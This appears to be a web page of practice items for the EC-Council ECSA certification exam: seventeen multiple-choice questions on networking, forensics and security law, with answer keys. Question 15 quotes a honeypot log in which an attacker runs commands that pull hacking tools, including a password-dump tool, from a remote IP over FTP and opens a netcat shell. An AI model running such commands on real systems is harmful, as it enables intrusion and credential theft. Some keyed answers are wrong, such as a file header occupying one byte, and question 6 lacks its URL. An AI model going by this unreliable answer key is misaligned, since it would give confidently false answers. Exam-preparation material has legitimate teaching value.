EC0-479試験無料問題集（232題）「EC-COUNCIL EC-Council Certified Security Analyst(ECSA) 認定」

出題：1

You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?

A. The firewall ACL has been purged

B. The firewall failed-bypass

C. The firewall failed-closed

D. The firewall failed-open

正解：D 解答を投票する

出題：2

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?

A. denial of service

B. digital attack

C. physical attack

D. ARP redirect

正解：A 解答を投票する

出題：3

The offset in a hexadecimal code is:

A. The first byte after the colon

B. The 0x at the end of the code

C. The last byte after the colon

D. The 0x at the beginning of the code

正解：D 解答を投票する

出題：4

An "idle" system is also referred to as what?

A. Zombie

B. PC not connected to the Internet

C. PC not being used

D. Bot

正解：A 解答を投票する

出題：5

When examining a file with a Hex Editor, what space does the file header occupy?

A. the last several bytes of the file

B. none, file headers are contained in the FAT

C. the first several bytes of the file

D. one byte at the beginning of the file

正解：D 解答を投票する

出題：6

What will the following URL produce in an unpatched IIS Web Server?

A. Directory listing of C: drive on the web server

B. Directory listing of the C:\windows\system32 folder on the web server

C. Insert a Trojan horse into the C: drive of the web server

D. Execute a buffer flow in the C: drive of the web server

正解：A 解答を投票する

出題：7

You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printer out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the ______________ in order to track the emails back to the suspect.

A. Email Header

B. Routing Table

C. Configuration files

D. Firewall log

正解：A 解答を投票する

出題：8

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?

A. 0:1709, 150

B. 0:1000, 150

C. 1:1709, 150

D. 0:1709-1858

正解：A 解答を投票する

出題：9

You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?

A. 70 years

B. the life of the author

C. copyrights last forever

D. the life of the author plus 70 years

正解：D 解答を投票する

出題：10

An Expert witness give an opinion if:

A. To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case

B. To define the issues of the case for determination by the finder of fact

C. To stimulate discussion between the consulting expert and the expert witness

D. The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

正解：D 解答を投票する

出題：11

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

A. Passive IDS

B. Progressive IDS

C. NIPS

D. Active IDS

正解：D 解答を投票する

出題：12

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A. Linux/Unix computers are constantly talking

B. Linux/Unix computers are easier to compromise

C. Windows computers are constantly talking

D. Windows computers will not respond to idle scans

正解：C 解答を投票する

出題：13

It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner?

A. only one

B. quite a few

C. by law, three

D. at least two

正解：A 解答を投票する

出題：14

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?

A. NAT does not work with statefull firewalls

B. IPSEC does not work with packet filtering firewalls

C. Statefull firewalls do not work with packet filtering firewalls

D. NAT does not work with IPSEC

正解：D 解答を投票する

出題：15

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo
haxedj00 >>ftpcom"
"cmd1.exe /c echo get n
C.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp-
s:ftpcom"
"cmd1.exe /c nc
-l -p 6969 -
e cmd1.exe"
What can you infer from the exploit given?

A. There are two attackers on the system -johna2k and haxedj00

B. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

C. The attack is a remote exploit and the hacker downloads three files

D. It is a local exploit where the attacker logs in using username johna2k

正解：C 解答を投票する

出題：16

Software firewalls work at which layer of the OSI model?

A. Data Link

B. Application

C. Transport

D. Network

正解：A 解答を投票する

出題：17

Bob has been trying to penetrate a remote production system for the past tow weeks. This time however, he is able to get into the system. He was able to use the System for a period of three weeks. However law enforcement agencies were recoding his every activity and this was later presented as evidence. The organization had used a Virtual Environment to trap BoB. What is a Virtual Environment?

A. An environment set up before an user logs in

B. An environment set up after the user logs in

C. A Honeypot that traps hackers

D. A system Using Trojaned commands

正解：C 解答を投票する

EC0-479試験無料問題集「EC-COUNCIL EC-Council Certified Security Analyst(ECSA) 認定」